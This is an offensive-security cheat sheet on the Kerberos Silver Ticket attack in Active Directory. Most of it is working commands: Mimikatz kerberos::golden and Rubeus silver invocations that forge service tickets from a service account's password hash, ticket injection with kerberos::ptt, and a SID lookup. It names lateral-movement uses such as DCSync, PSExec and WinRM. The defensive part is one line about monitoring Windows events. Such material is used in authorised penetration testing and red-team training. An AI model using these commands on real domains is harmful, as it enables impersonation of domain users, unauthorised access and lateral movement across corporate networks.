Silver Tickets

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Useful links
  5. Recommendations


To lateralize on the network, you can forge Silver Tickets using Mimikatz. Silver Ticket attack consists in forging a Kerberos TGS for a service by impersonating any domain user. For instance, you can perform following attacks once you will forge required service tickets:

  • DCSync: LDAP (on Domain Controllers only).
  • PSExec: HOST and CIFS.
  • WinRM: HOST and HTTP.


  • Having a SPN target and its associated SPN password hash.
  • Having the domain user SID you want to impersonate.


Let’s assume we want to gain access to a web application hosted on IIS owned by a SPN. First, we can check we actually have not access to it.

# From a domain joined Windows computer
# It might respond "401 - Unauthorized: Access is denied due to invalid credentials"
Invoke-WebRequest -UseDefaultCredentials http://$target

Before forging our Silver Ticket, you need to obtain the SPN password hash of our target. Then, get the SID of the user you want to impersonate.

# From a domain joined Windows computer.
whoami /user

You can now forge the Silver Ticket and access your target.

# With Mimikatz or Rubeus.
kerberos::golden /sid:$sid /domain:$domain /target:$hostname /service:http /rc4:$hash /user:$username
.\Rubeus.exe silver /service:http/$hostname.$domain /aes256:$hash /user:$username /domain:$domain /sid:$sid /nowrap

# Inject the ticket in memory.
kerberos::ptt ticket.kirbi

# Or create a dummy session before.
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:$domain /username:$username /password:$whatever /ticket$Base64EncodedTicket

You can also use this attack to access an domain computer via SMB by using the machine account SID and its associated hash.

# With Mimikatz.
kerberos::golden /sid:$sid /domain:$domain /target:$hostname /service:cifs /rc4:$hash /user:$username

If the $sid is S-1-5-21-1987370270-658905905-1781884369**-1105, don’t take the final part after the last -. You will only need **S-1-5-21-1987370270-658905905-1781884369.


  • This method take advantage of a normal Kerberos behavior. The only thing you can do is monitor corresponding Windows events to detect and block this attack.